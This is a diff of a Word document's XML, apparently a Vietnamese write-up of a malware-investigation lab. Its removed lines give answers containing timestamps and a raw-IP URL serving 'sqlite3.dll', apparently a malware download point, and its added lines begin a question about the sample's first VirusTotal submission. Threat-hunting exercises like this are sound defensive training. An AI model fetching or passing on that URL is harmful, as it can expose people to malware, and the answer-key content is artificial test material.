-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>2025-06-23</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> UTC </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve">và có URL </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>path</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> “</w:t>
-      </w:r>
-      <w:hyperlink r:id="rId7" w:history="1">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:sz w:val="26"/>
-            <w:szCs w:val="26"/>
-          </w:rPr>
-          <w:t>http://171.22.28.221/9e226a84ec50246d/sqlite3.dll</w:t>
-        </w:r>
-      </w:hyperlink>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>”</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -1676,79 +1923,11 @@
           <w:szCs w:val="26"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">Và lần thứ 2 cũng chính là đáp án, vào lúc </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>2026-09-13</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> UTC có URL </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>path</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve">: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:tab/>
-        <w:t>http://171.22.28.221/9e226a84ec50246d/sqlite3.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>dll”</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35EA0D91" wp14:editId="0B568B50">
-            <wp:extent cx="5943600" cy="2874645"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D2F6AE1" wp14:editId="5EDC7FCB">
+            <wp:extent cx="5943600" cy="2779395"/>
             <wp:effectExtent l="0" t="0" r="0" b="1905"/>
-            <wp:docPr id="501408301" name="Picture 1"/>
+            <wp:docPr id="60331957" name="Picture 1"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -1756,7 +1935,716 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="501408301" name=""/>
+                    <pic:cNvPr id="60331957" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId7"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="2779395"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:vanish/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:vanish/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Top of Form</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:vanish/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:vanish/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Bottom of Form</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Q3</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Knowing</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>exact</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>timestamp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>of</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>when</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>malware</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>was</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>first</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>observed</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> can </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>help</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>prioritize</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>response</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>actions</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Newly</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>detected</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>malware</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> may </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>require</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>urgent</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>containment</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>and</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>eradication</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>compared</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> to </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>older</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>well-documented</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>threats</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>What</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>is</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the UTC </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>timestamp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>of</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>malware's</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>first</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>submission</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> to </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>VirusTotal</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
